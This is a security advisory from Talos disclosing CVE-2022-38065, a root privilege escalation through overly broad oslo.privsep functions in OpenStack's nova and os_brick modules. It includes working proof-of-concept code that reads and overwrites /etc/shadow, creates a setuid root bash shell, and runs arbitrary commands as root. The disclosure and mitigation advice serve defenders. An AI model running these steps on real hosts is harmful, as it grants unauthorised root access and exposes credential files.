Talos Vulnerability Report

TALOS-2022-1599

OpenStack oslo.privsep privilege escalation vulnerability

December 20, 2022
CVE Number

CVE-2022-38065

SUMMARY

A privilege escalation vulnerability exists in the oslo.privsep functionality of OpenStack git master 05194e7618 and prior. Overly permissive functionality within tools leveraging this library within a container can lead increased privileges.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

OpenStack git master 05194e7618

PRODUCT URLS

OpenStack - https://opendev.org/openstack/

CVSSv3 SCORE

8.8 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-269 - Improper Privilege Management

DETAILS

OpenStack is a cloud platform that contains a number of tools, libraries and services for providing simplified, powerful and scalable cloud-based applications.

OpenStack’s oslo.privsep library “helps applications perform actions which require more or less privileges… in a safe, easy to code and easy to use manner.” An entry in sudoers is generally added to bootstrap oslo.privsep with the correct privileges when run from an unprivileged user such as nova.

The oslo.privsep design documents state the following:

Privileged functions must be as simple, specialized and narrow as possible, so as to prevent further escalation. In this example, 
update_motd(message) is narrow: it only allows the service to overwrite the MOTD file. If a more generic update_file(filename, content) was created, 
it could be used to overwrite any file in the filesystem, allowing easy escalation to root rights. That would defeat the whole purpose of oslo.privsep.
...
Provided the unprivileged<->privileged boundary contains any hole that effectively grants root to the caller, then there is little benefit to having the separation [provided by privsep]

Two modules were observed to have functions that were overly broad and allowed for trivial escalation to root. The nova module contains privileged wrappers for chmod, chown and rmdir, as well as arbitrary file create/write/move/read. Second, the os_brick module contains functions to execute arbitrary shell commands as root. The source file contains the following comment from 2016:

Just in case it wasn't clear, this is a massive security back-door. [these wrappers] allow any command to be run as the privileged user (default "root"). 
This is intended only as an expedient transition and should be removed ASAP.

Either of the above modules are sufficient to achieve privilege escalation to root. Other modules within OpenStack were not audited, but it is possible that similar issues exist elsewhere in the codebase.

Crash Information

Method 1 (nova)
from nova.privsep.path import *
from oslo_config.cfg import CONF
CONF.privsep_context = 'nova.privsep.sys_admin_pctxt'
# Read /etc/shadow
last_bytes("/etc/shadow", 1000)
# Write to /etc/shadow
writefile("/etc/shadow", "wb", b"<payload_here>")
# Get a root shell
os.system("cp /bin/bash /tmp/bash")
chown("/tmp/bash", 0)
chmod("/tmp/bash", 0o4755)
os.system("/tmp/bash -p")
bash-5.1#
Method 2 (os_brick)
from os_brick.privileged.rootwrap import *
from oslo_config.cfg import CONF
import shlex # helpful for multi-arg commands
CONF.privsep_context = 'os_brick.privileged.default'
execute_root(*shlex.split("id"))
('uid=0(root) gid=0(root) groups=0(root)\n', '')

Mitigation

Privileged functions in the nova and os_brick modules of OpenStack should be rewritten to be as specialized and narrowly tailored as possible; e.g. chmod(path, mode) should be replaced with a function that only applies pre-defined permissions on one or more pre-defined files.

Suggest auditing other modules that use oslo.privsep to identify similar issues.

TIMELINE

2022-09-07 - Vendor Disclosure
2022-12-20 - Public Release

Credit

Keane O'Kelley of Cisco ASIG